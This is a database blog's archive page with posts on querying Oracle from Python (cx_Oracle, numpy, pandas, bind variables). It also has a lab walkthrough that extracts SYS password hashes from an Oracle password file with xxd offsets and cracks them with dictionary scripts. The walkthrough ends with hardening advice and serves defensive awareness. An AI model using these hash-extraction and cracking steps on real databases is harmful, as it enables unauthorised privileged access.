Data … as usual

All things about data by Laurent Leturgez

Category Archives: Python

Executing a SQL Statement with bind variables on Oracle with Python

Leave a comment Posted by on September 21, 2018

In the previous blog post, I detailed how to execute sql statement on an Oracle database with Python. (See here for more details: https://laurent-leturgez.com/2018/08/30/executing-a-sql-statement-on-oracle-with-python/)

As you have seen, I used two kind of data structure to get the results: numpy array, and pandas array and for each, it’s possible to get the results in these structures and filter it directly in the Python script. The problem is that it will cause some issues regarding the dataset size in memory, network roundtrips etc.

So, as usual it’s always better to use Oracle capacity to filter data, joins them (in case of tables that resides in the Oracle database). And if you want to reduce parsing inside Oracle, you will probably want to use bind variables inside your SQL Statements … so how do we do this with python?

That will mostly depend on your result set data structure (numpy or pandas).

Just before we start the details, I consider that you are now able to get a Connection from an Oracle Database using cx_Oracle package (if not … see: https://laurent-leturgez.com/2018/07/31/connecting-python-to-an-oracle-database/).

Using numpy

For this purpose, we will have to declare an associative array of bind variables.

For example, the code below will declare, in an associative array “p” the bind variable named “param” and its value “log_archive_dest_1”  :


p = {'param': "log_archive_dest_1"}

Of course, in your statement declaration, you have to name your bind variable the same as declared in your associative array (in our case, param). If you have many bind variables in the same statement, let’s say p1 and p2, you will have to declare your associative array as follows:

p = {'p1': "log_archive_dest_1", 'p2': "log_archive_dest_2"}

Once declared, you just have to execute the statement and associate the array as parameters:


from __future__ import print_function

import cx_Oracle
import os
import numpy as np
import pandas as pd


oh="D:/tools/Oracle/instantclient_12_2_x8664"
os.environ["ORACLE_HOME"]=oh
os.environ["PATH"]=oh+os.pathsep+os.environ["PATH"]
os.environ["NLS_LANG"]="AMERICAN_AMERICA.AL32UTF8"

.../...

def executeStmt(conn, stmt, parameters):
    if conn is not None and isinstance (conn, cx_Oracle.Connection):
        cur = conn.cursor()
        if parameters is None:
            cur.execute (stmt)
        else:
            cur.execute(stmt,parameters)
    return cur

.../...

if __name__ == '__main__':
    c=cx_Oracle.Connection
    stmt="select name,value from v$parameter where name = :param"
    try:
        c=connectToOracle("192.168.99.2:1521/orcl","sys","oracle",mode=cx_Oracle.SYSDBA)
        p = {'param': "log_archive_dest_1"}
        
        print (">>>>>>    NUMPY STYLE")
        curs=executeStmt(c,stmt,p)
        if curs.rowcount!=0:
            curs.scroll(value=0)
        r = curs.fetchall()
        print("type(r) = ",type(r))
        n = np.array (r)
        print("type(n) =",type(n))
        print("n=", n)

        curs.close()
    except cx_Oracle.DatabaseError as ex:
        err, =ex.args
        print("Error code    = ",err.code)
        print("Error Message = ",err.message)
        os._exit(1)
    c.close()

Please notice that I converted the list return by fetchall call to a numpy array. If you prefer to use list, you can work directly on it without converting it to a numpy array.

This piece of code will produce the results below:

>>>>>>    NUMPY STYLE
type(r) =  <type 'list'>
type(n) = <type 'numpy.ndarray'>
n= [['log_archive_dest_1' None]]

Using Pandas

Using pandas dataframe is a bit different and, as mentioned in the previous post, I prefer to use pandas dataframes when dealing with a rdbms (like Oracle). Why? because of its capabilities (filtering, joining etc.)

Ok, but now, how do we deal with SQL Statement and bind variable with python and pandas dataframes ?

The principle is nearly the same as sql statement without bind variables.

You have to call read_sql function, and pass the same associative array as parameters … and that’s it 🙂 … See below


from __future__ import print_function

import cx_Oracle
import os
import numpy as np
import pandas as pd


oh="D:/tools/Oracle/instantclient_12_2_x8664"
os.environ["ORACLE_HOME"]=oh
os.environ["PATH"]=oh+os.pathsep+os.environ["PATH"]
os.environ["NLS_LANG"]="AMERICAN_AMERICA.AL32UTF8"

.../...

if __name__ == '__main__':
    c=cx_Oracle.Connection
    stmt="select name,value from v$parameter where name = :param"
    try:
        c=connectToOracle("192.168.99.2:1521/orcl","sys","oracle",mode=cx_Oracle.SYSDBA)
        p = {'param': "log_archive_dest_1"}

        print(">>>>>>    PANDAS STYLE")
        dataframe=pd.read_sql(stmt,con=c,params=p)
        print("type(dataframe)",type(dataframe))
        print(dataframe)

        # Panda conversion to numpy is always possible.
        # n=dataframe.values
        curs.close()
    except cx_Oracle.DatabaseError as ex:
        err, =ex.args
        print("Error code    = ",err.code)
        print("Error Message = ",err.message)
        os._exit(1)
    c.close()

That will produce the same kind of results:

>>>>>>    PANDAS STYLE
type(dataframe) <class 'pandas.core.frame.DataFrame'>
                 NAME VALUE
0  log_archive_dest_1  None

On the database side

On the database side, you will find this kind of statement on the shared pool:

SQL> select sql_id,sql_fulltext,executions
  2  from v$sql
  3  where sql_text like 'select name,value from v%';

SQL_ID        SQL_FULLTEXT                                                                     EXECUTIONS
------------- -------------------------------------------------------------------------------- ----------
4zqq6y8cdbqmu select name,value from v$parameter where name = :param                                   17

You can see the bind variable name can be found in the statement and not an anonymous :1 or :B1 😉

In a next blogpost, I will show how to call a PLSQL stored procedure / function / package from Python.

 

Source code is available on my gitlab: https://gitlab.com/lolo115/python/tree/master/oracle

That’s it for today 😉

Advertisement
12c, Development, Python, SQL

Executing a SQL Statement on Oracle with Python

1 Comment Posted by on August 30, 2018

In the first blogpost of this series dedicated to Oracle and Python, I described how to connect a Python script to an Oracle Database (see. connecting python to an oracle database). In this second post, I will describe how to query an Oracle database and gets some results by using most popular Python libraries for this stuff: numpy and pandas.

So, first thing to do, you have to install pandas and numpy libraries in your work environnement (virtualenv, miniconda etc.). And of course, cx_Oracle has to be installed too 😉

In my case, libraries are deployed in my virtualenv hosted in PyCharm project:

In the program I write, in order to load packages and configure basics, I will use the header below:

from __future__ import print_function

import cx_Oracle
import os
import numpy as np
import pandas as pd


oh="D:/tools/Oracle/instantclient_12_2_x8664"
os.environ["ORACLE_HOME"]=oh
os.environ["PATH"]=oh+os.pathsep+os.environ["PATH"]
os.environ["NLS_LANG"]="AMERICAN_AMERICA.AL32UTF8"

First step, write a function to connect the database

So, first thing to write is a function that will return a cx_Oracle connection object (or reuse the function used in the first blogpost 😉 ).

This function will user parameters like username, password, datasource name (or url) and optionaly the mode used (SYSDBA for example).

def connectToOracle(url, username, password, mode=None):
    if mode is not None:
        connection = cx_Oracle.Connection (user=username, password=password, dsn=url, mode=mode)
    else:
        connection = cx_Oracle.Connection (user=username, password=password, dsn=url)
    return connection

 

Get a cursor and execute a statement

Once we have a cx_Oracle connection object, we can create a cursor by executing the cursor() function and then execute a statement.

To do this, I wrote a function with two parameters: the connection object and the statement text, and this returns the cursor that has been executed in the function:


def executeStmt(conn, stmt):
    if conn is not None and isinstance (conn, cx_Oracle.Connection):
        cur = conn.cursor()
        cur.execute(stmt)
    return cur

Once the cursor will be executed, we will be able to fetch one, many or all rows, and to describe it to get more metadata.

 

Describe executed cursor to get some metadata

By describing the cursor, we are able to get some information of its structure (column name and types, number precision and scale, nullable column etc.).

To do that, we use a read only attribute of the cursor (named description). In this attribute, there are 7 items that can be read.

These items are the ones below:

  • Item 1: Column names
  • Item 2: Column types (types are cx_Oracle data types)
  • Item 3: Column displayed sizes
  • Item 4: Column internal sizes
  • Item 5: Column precision
  • Item 6: Column scale
  • Item 7: Nullable column

This function code is the one below:


def describeCursor(cur):
    if cur is not None and isinstance (cur, cx_Oracle.Cursor):
        colnames = [row[0] for row in cur.description]
        coltypes = [row[1] for row in cur.description]
        coldisplay_sz = [row[2] for row in cur.description]
        colinternal_sz = [row[3] for row in cur.description]
        colprecision = [row[4] for row in cur.description]
        colscale = [row[5] for row in cur.description]
        colnullok = [row[6] for row in cur.description]
    print("Column names     : ",colnames)
    print("Column types     : ",coltypes)
    print("Display Size     : ",coldisplay_sz)
    print("Internal Size    : ",colinternal_sz)
    print("Column precision : ",colprecision)
    print("Column Scale     : ",colscale)
    print("Null OK?         : ",colnullok)

It can be used like this:


if __name__ == '__main__':
    c=cx_Oracle.Connection
    stmt="select name,value from v$parameter where name like 'log_archive%' and name not like 'log_archive_dest%' "
    try:
        c=connectToOracle("192.168.99.2:1521/orcl","sys","oracle",mode=cx_Oracle.SYSDBA)
        curs=executeStmt(c,stmt)
        describeCursor(curs)
...
        curs.close()
    except cx_Oracle.DatabaseError as ex:
        err, =ex.args
        print("Error code    = ",err.code)
        print("Error Message = ",err.message)
        os._exit(1)
    c.close()

And will produce this kind of result:


Column names     :  ['NAME', 'VALUE']
Column types     :  [<type 'cx_Oracle.STRING'>, <type 'cx_Oracle.STRING'>]
Display Size     :  [80, 4000]
Internal Size    :  [80, 4000]
Column precision :  [None, None]
Column Scale     :  [None, None]
Null OK?         :  [1, 1]

 

Get results of the cursor execution

Once the cursor executed, you can fetch your cursor row by row, you can fetch a set of n rows, or fetch all the rows.

Fetching the cursor

To do that, you have to use these function (from cursor)

  • fetchone() will return a list of one tuple
  • fetchmany(n) will return  a list of n tuples
  • fetchall() will return a list of n tuples (n is equal to the number of rows in the cursor)

for example, this piece of code:





<pre>if __name__ == '__main__':
    c=cx_Oracle.Connection
    stmt="select name,value from v$parameter where name like 'log_archive%' and name not like 'log_archive_dest%' "
    try:
        c=connectToOracle("192.168.99.2:1521/orcl","sys","oracle",mode=cx_Oracle.SYSDBA)
        curs=executeStmt(c,stmt)
        r=curs.fetchmany(2)
        print("R=",r)
        curs.close()
    except cx_Oracle.DatabaseError as ex:
        err, =ex.args
        print("Error code    = ",err.code)
        print("Error Message = ",err.message)
        os._exit(1)
    c.close()</pre>

will produce this result:

R= [('log_archive_start', 'FALSE'), ('log_archive_duplex_dest', None)]

 

Displaying the cursor results

Once the cursor has been executed and the rows fetched, you can use numpy or pandas to work on the data.

Numpy

Numpy is a library which is primarly used for scientific computing. So, it’s not the best if your resultset is made of string datatypes.

A better way to proceed is:

  1. fetch your cursor
  2. convert the result into a numpy array. And decribe the types of your array.

For example:


if __name__ == '__main__':
    c=cx_Oracle.Connection
    stmt="select SIZE_FOR_ESTIMATE,SIZE_FACTOR,ESTD_PHYSICAL_READS from v$db_cache_advice"
    try:
        c=connectToOracle("192.168.99.2:1521/orcl","sys","oracle",mode=cx_Oracle.SYSDBA)
        curs=executeStmt(c,stmt)
        # Fetch all rows from the cursor
        r=curs.fetchall()
        # convert the r variable into a numpy array and describe it
        n=np.array(r,dtype=[('SIZE_FOR_ESTIMATE','float64'),('SIZE_FACTOR','float64'),('ESTD_PHYSICAL_READS','float64')])
        print("ndim=",n.ndim)
        print("n=",n)
        curs.close()
    except cx_Oracle.DatabaseError as ex:
        err, =ex.args
        print("Error code    = ",err.code)
        print("Error Message = ",err.message)
        os._exit(1)
    c.close()

This piece of code will produce the result above:

n= [(  96., 0.0896, 9690.) ( 192., 0.1791, 9690.) ( 288., 0.2687, 9690.)
 ( 384., 0.3582, 9690.) ( 480., 0.4478, 9690.) ( 576., 0.5373, 9690.)
 ( 672., 0.6269, 9690.) ( 768., 0.7164, 9690.) ( 864., 0.806 , 9690.)
 ( 960., 0.8955, 9690.) (1056., 0.9851, 9690.) (1072., 1.    , 9690.)
 (1152., 1.0746, 9690.) (1248., 1.1642, 9690.) (1344., 1.2537, 9690.)
 (1440., 1.3433, 9690.) (1536., 1.4328, 9690.) (1632., 1.5224, 9690.)
 (1728., 1.6119, 9690.) (1824., 1.7015, 9690.) (1920., 1.791 , 9690.)]

Note: If you want to get more information about type conversion into numpy data type see: 

 

A better way to proceed, specially if you want to execute some joins between two datasets is to use Pandas.

Pandas

Pandas is a python library which provide easy to use data structures. It uses a central data structure named dataframe with which you can execute filters, joins etc.

When you decide to create pandas dataframes from data coming from Oracle (or another database, CSV file, JSON etc.), you have to use pandas function written specifically for this purpose. And in the case of an Oracle database, you have a function read_sql() that can be executed with a sql statement given in parameter. It will create a pandas dataframe and then you will be able to proceed this structure in your python script.

One advantage of pandas dataframes is in its data types because they are converted directly depending on the types returned by the cursor, and you don’y need to create a cursor, execute it and then fetch the rows … everything is automatic.

But let’s have a look to a piece of code (I will publish the complete script to show we don’t need explicit cursors etc.):


from __future__ import print_function

import cx_Oracle
import os
import pandas as pd


oh="D:/tools/Oracle/instantclient_12_2_x8664"
os.environ["ORACLE_HOME"]=oh
os.environ["PATH"]=oh+os.pathsep+os.environ["PATH"]
os.environ["NLS_LANG"]="AMERICAN_AMERICA.AL32UTF8"


def connectToOracle(url, username, password, mode=None):
    if mode is not None:
        connection = cx_Oracle.Connection (user=username, password=password, dsn=url, mode=mode)
    else:
        connection = cx_Oracle.Connection (user=username, password=password, dsn=url)
    return connection

# main
if __name__ == '__main__':
    c=cx_Oracle.Connection

    stmt="select SIZE_FOR_ESTIMATE,SIZE_FACTOR,ESTD_PHYSICAL_READS from v$db_cache_advice"
    try:
        c=connectToOracle("192.168.99.2:1521/orcl","sys","oracle",mode=cx_Oracle.SYSDBA)
        dataframe=pd.read_sql(stmt,con=c)
        print("------\nDF : \n ",dataframe)
        print("------\nDF Data types : \n",dataframe.dtypes)
        print("------\nDF Filtered   : \n",dataframe[dataframe['SIZE_FOR_ESTIMATE']>1440])
    except cx_Oracle.DatabaseError as ex:
        err, =ex.args
        print("Error code    = ",err.code)
        print("Error Message = ",err.message)
        os._exit(1)
    c.close()

We just have to instantiate a cx_Oracle connection, and then use pandas read_sql function to get a pandas dataframe and then process it.

In the previous basic example, I printed it, its datatypes and then run a filter which produces this kind of results:

------
DF : 
      SIZE_FOR_ESTIMATE  SIZE_FACTOR  ESTD_PHYSICAL_READS
0                  96       0.0896                 9766
1                 192       0.1791                 9766
2                 288       0.2687                 9766
3                 384       0.3582                 9766
4                 480       0.4478                 9766
5                 576       0.5373                 9766
6                 672       0.6269                 9766
7                 768       0.7164                 9766
8                 864       0.8060                 9766
9                 960       0.8955                 9766
10               1056       0.9851                 9766
11               1072       1.0000                 9766
12               1152       1.0746                 9766
13               1248       1.1642                 9766
14               1344       1.2537                 9766
15               1440       1.3433                 9766
16               1536       1.4328                 9766
17               1632       1.5224                 9766
18               1728       1.6119                 9766
19               1824       1.7015                 9766
20               1920       1.7910                 9766
------
DF Data types : 
 SIZE_FOR_ESTIMATE        int64
SIZE_FACTOR            float64
ESTD_PHYSICAL_READS      int64
dtype: object
------
DF Filtered   : 
     SIZE_FOR_ESTIMATE  SIZE_FACTOR  ESTD_PHYSICAL_READS
16               1536       1.4328                 9766
17               1632       1.5224                 9766
18               1728       1.6119                 9766
19               1824       1.7015                 9766
20               1920       1.7910                 9766

More information on pandas dataframes and their capacities is available at the following url: https://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.html

In a next blogpost (probably shorter than this one), I will explain on how to use bind variables in statement.

Source code is fully available on my gitlab: https://gitlab.com/lolo115/python/tree/master/oracle

 

That’s it for today !!! 😉

 

 

12c, Development, Python, SQL

Connecting Python to an Oracle Database

4 Comments Posted by on July 31, 2018

I decided to write a new series of blogposts related to python programming language and its interactions with Oracle.

Python is a powerful scripting language with a lot of packages that can be installed for various stuff (scientific computing, dataviz, machine learning, deep learning etc.).

In my case, I used python for many things and specially for running my sql tuning scripts on an Oracle database, and then present the results with beautiful graphs.

This first blogpost will present how I use python on my laptop and how to install the required package to connect an Oracle Database.

 

1. Work Environment

I used python on my MS Windows laptop, and I used two versions of python depending on what I have to do or packages I will have to use.

So I installed two distributions of python :

You are free to use the version of Python you want to use and/or bundled with the package installer of your choice.

Next, I use a very well known python IDE name PyCharm (https://www.jetbrains.com/pycharm/download). PyCharm is released with 2 versions : a professional one (not free) and a free distribution (named community edition). The community edition is enough for my needs.

In PyCharm, you can run what is called a virtual-environment which is a kind of clone of your python installation where you will be able to deploy the package you want.

That can be assimilated to a “project” because in PyCharm, when you create a new project, you have to configure an interpreter, and pyCharm will automatically create a new virtual environment (default) based on the interpreter you chose :

Once the project has been created, we have to install the package required to connect to an Oracle Database : cx_Oracle.

In your pyCharm project, you have to open the project settings (in the “File” Menu) and then click on the “Project Interpreter” sub menu. The packages installed in your virtual environment appear.

Now, it’s easy to add a package by clicking on the “+” icon and search for cx_oracle package, and click on Install Package to install it. (For compatibility matrix, visit https://oracle.github.io/python-cx_Oracle/)

Don’t forget to install an Oracle Client (Instant client or full client) and configure your windows environment with ORACLE_HOME and PATH environment variables. In the example below, I decided to set the environment variable in the script (because I have many clients installed on my laptop) :


from __future__ import print_function

import cx_Oracle
import os

oh="D:/tools/Oracle/instantclient_12_2_x8664"
os.environ["ORACLE_HOME"]=oh
os.environ["PATH"]=oh+os.pathsep+os.environ["PATH"]

print("Running tests for cx_Oracle version", cx_Oracle.version,"built at", cx_Oracle.buildtime)
print("File:", cx_Oracle.__file__)
print("Client Version:", ".".join(str(i) for i in cx_Oracle.clientversion()))

If this piece of code runs fine … you have correctly configured your environnent.

 

2. Connect to an Oracle database

Once your development environment configured, connecting a python script to an Oracle Database is really easy.

You just have to execute Connection constructor from cx_Oracle and then you will get a connection object. Of course, you have to catch the correct exception if an error occured during Connection call:


from __future__ import print_function

import cx_Oracle
import os

oh="D:/tools/Oracle/instantclient_12_2_x8664"
os.environ["ORACLE_HOME"]=oh
os.environ["PATH"]=oh+os.pathsep+os.environ["PATH"]
os.environ["NLS_LANG"]="AMERICAN_AMERICA.AL32UTF8"

def printConnectionAttr(connection):
    if connection is not None and isinstance(connection,cx_Oracle.Connection):
        print("Data Source Name  = ",connection.dsn)
        a="true" if connection.autocommit==1 else "False"
        print("Autocommit         = ",a)
        print("Session Edition    = ",connection.edition)
        print("Encoding           = ",connection.encoding)
        print("National Encoding  = ",connection.nencoding)
        print("Logical Tx Id      = ",connection.ltxid)
        print("Server version     = ",connection.version)

def connectToOracle(url, username, password, mode=None):
    if mode is not None:
        connection = cx_Oracle.Connection (user=username, password=password, dsn=url, mode=mode)
    else:
        connection = cx_Oracle.Connection (user=username, password=password, dsn=url)
    
    return connection


# main
if __name__ == '__main__':
    c=cx_Oracle.Connection
    try:
        c=connectToOracle("192.168.99.2:1521/orcl","sys","oracle",mode=cx_Oracle.SYSDBA)
    except cx_Oracle.DatabaseError as ex:
        err, =ex.args
        print("Error code    = ",err.code)
        print("Error Message = ",err.message)
        os._exit(1)

    printConnectionAttr(c)
    c.close()

This piece of code will connect to an Oracle Database and will print the connection details:

 

Data Source Name  =  192.168.99.2:1521/orcl
Autocommit         =  False
Session Edition    =  None
Encoding           =  UTF-8
National Encoding  =  UTF-8
Logical Tx Id      =  
Server version     =  12.1.0.2.0

Source code is fully available on my gitlab: https://gitlab.com/lolo115/python/tree/master/oracle

Ok, so that’s it for this first part … in a next blog post, I will present how to execute a basic statement with Python and Cx_Oracle

 

12c, Development, Python, SQL

Brute forcing the Oracle Password file

Leave a comment Posted by on December 15, 2017

If you want to remotely connect to your Oracle instance as sysdba, by default (ie. remote_login_passwordfile=EXCLUSIVE), you will probably use the password file (located in $ORACLE_HOME/dbs) to identify the SYS user.

Below, I used auditd to show that the password file is read by the server process when connecting remotely:

[oracle@oel6 ~]$ sudo service auditd status
auditd (pid  2422) is running...

[oracle@oel6 ~]$ sudo auditctl -l
No rules

[oracle@oel6 ~]$ sudo auditctl -w $ORACLE_HOME/dbs/orapworcl -p r
[oracle@oel6 ~]$ sudo auditctl -l
-w /u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl -p r

[oracle@oel6 ~]$ sqlplus sys@orcl as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Fri Dec 15 09:14:52 2017

Copyright (c) 1982, 2016, Oracle.  All rights reserved.

Enter password:

Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production


[oracle@oel6 ~]$ sudo ausearch -f $ORACLE_HOME/dbs/orapworcl | grep -A 2 '^type=PATH'
type=PATH msg=audit(1513326435.361:310): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.361:310):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.361:310): arch=c000003e syscall=2 success=yes exit=7 a0=7ffe8aaf9c18 a1=0 a2=0 a3=3 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.361:311): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.361:311):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.361:311): arch=c000003e syscall=2 success=yes exit=7 a0=7ffe8aaf9c18 a1=0 a2=0 a3=3 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.361:312): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.361:312):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.361:312): arch=c000003e syscall=2 success=yes exit=7 a0=797bfbd8 a1=0 a2=0 a3=7ffe8aaf9c70 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.361:313): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.361:313):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.361:313): arch=c000003e syscall=2 success=yes exit=7 a0=797bfbd8 a1=1002 a2=0 a3=797bfdf0 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.366:314): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.366:314):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.366:314): arch=c000003e syscall=2 success=yes exit=7 a0=7ffe8aae9288 a1=0 a2=0 a3=3 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.366:315): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.366:315):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.366:315): arch=c000003e syscall=2 success=yes exit=7 a0=7ffe8aae9288 a1=0 a2=0 a3=3 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.366:316): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.366:316):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.366:316): arch=c000003e syscall=2 success=yes exit=7 a0=797bfbd8 a1=0 a2=0 a3=0 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.366:317): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.366:317):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.366:317): arch=c000003e syscall=2 success=yes exit=7 a0=797bfbd8 a1=1002 a2=0 a3=797bfdf0 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)

[oracle@oel6 ~]$ ps -ef | grep 7840
oracle    7840     1  0 09:27 ?        00:00:00 oracleorcl (LOCAL=NO)

So, if we have a closer look to this binary file, we can find various password hashes. In my example, I configured my sqlnet with SQLNET.ALLOWED_LOGON_VERSION_SERVER=11. As a result, my password file contains 10g, 11g and 12c password hashes for the SYS user.

Below, I used xxd linux command with specific offsets on my password file to get the password hashes (in bold in the output):

  • 10g sys password hash
[oracle@oel6 ~]$ xxd -c16 -g0 -s +0x0484 -l 16 $ORACLE_HOME/dbs/orapworcl
0000484: 32363235343335323638333944303441 262543526839D04A
  • 11g sys password hash
[oracle@oel6 ~]$ xxd -c30 -g0 -s +0x04ac -l 30 $ORACLE_HOME/dbs/orapworcl
00004ac: 2adaa0a90bf26f339c49fe9948ab88a20baf82f93ef3c5da13ca5eb95314 *.....o3.I..H.......>.....^.S.

First part (20 first bytes): SHA1 digest

[oracle@oel6 ~]$ xxd -c20 -g0 -s +0x04ac -l 20 $ORACLE_HOME/dbs/orapworcl
00004ac: 2adaa0a90bf26f339c49fe9948ab88a20baf82f9 *.....o3.I..H.......

Second part (10 next bytes): Salt used by Oracle

[oracle@oel6 ~]$ xxd -c10 -g0 -s +0x4C0 -l 10 $ORACLE_HOME/dbs/orapworcl
00004c0: 3ef3c5da13ca5eb95314 >.....^.S.
  • 12c sys password hash
[oracle@oel6 ~]$ xxd -c80 -g0 -s +0x04CA -l 80 $ORACLE_HOME/dbs/orapworcl
00004ca: ad84face7a337c03baacca0bc63f97068e51edd0d6c53826ce8c347594a2800f92c736b4c83239fa47414ff2f68f45304b016ae215ed595c8b71c3c5a0ca3a0630e931d0f7d3929c9a6fb131f2fa0427 ....z3|......?...Q....8&..4u......6..29.GAO...E0K.j...Y\.q....:.0.1......o.1...'

Note: if you use the default configuration of oracle 12.2, you will only find 11g and 12c hashes.

 

Once these hashes have been found, I wrote some python scripts to brute force with a dictionary file to guess the password. Those scripts are available at this URL: https://github.com/lolo115/oracrack

First of all, I used the ora10g_hash_bf.py against the 10g hash to find the case insensitive password:

[oracle@oel6 sec]$ ./ora10g_hash_bf.py dict.txt sys 262543526839D04A
DICTFILE = dict.txt
USERNAME = sys
HASH     = 262543526839D04A
PASSWORD FOUND FOR USER sys !!! PASSWORD IS: rockyou
------
Be careful, the found password is case insensitive. The real password can include upper character(s)
Now generate all combinations for this password and run ora11g_hash_bf.py script to find the case sensitive password

Ok, the password is weak and the program found it in the dictionary file, but if we try it on our database, it fails because I used a sqlplus 12.2 client that use case sensitive passwords (and my SQLNET client configuration is the default one):

$ sqlplus sys/rockyou@orcl as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Fri Dec 15 10:06:37 2017

Copyright (c) 1982, 2016, Oracle.  All rights reserved.

ERROR:
ORA-01017: invalid username/password; logon denied

So, now as I know that the sys password is something like “rockyou” with upper and lower characters in it, I will use my “gen_all_comb.py” script to generate my own dictionary file that will contains all the combination for the “rockyou” password:

[oracle@oel6 sec]$ ./gen_all_comb.py rockyou > mydict.txt
[oracle@oel6 sec]$ head mydict.txt
rockyou
rockyoU
rockyOu
rockyOU
rockYou
rockYoU
rockYOu
rockYOU
rocKyou
rocKyoU
.../...

As the last operation, I have to use the ora11g_hash_bf.py script against the 11g hash (which is case sensitive) with my previously generated dictionary (mydict) and the script will find the correct password:

[oracle@oel6 sec]$ ./ora11g_hash_bf.py mydict.txt sys 2adaa0a90bf26f339c49fe9948ab88a20baf82f93ef3c5da13ca5eb95314
DICTFILE = mydict.txt
USERNAME = sys
HASH     = 2adaa0a90bf26f339c49fe9948ab88a20baf82f93ef3c5da13ca5eb95314
PASSWORD FOUND FOR USER sys !!! PASSWORD IS: RocKyoU

So let’s try:

[oracle@oel6 sec]$ sqlplus sys/RocKyoU@orcl as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Fri Dec 15 10:12:17 2017

Copyright (c) 1982, 2016, Oracle.  All rights reserved.


Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

SQL>

In this blog post, I described how to brute force SYS password that is stored in the password file without trying to connect number of times to the database and lock account etc. Please note that, I didn’t read at any time the USER$ table too.

To avoid this, you can simply disable password file usage by setting remote_login_passwordfile to NONE and remove this password file. You can set a SYS password  that is not weak (or use a password function with a profile etc.), there are too many customers that are still setting sys password to oracle, oracle123 or welcome1 ….

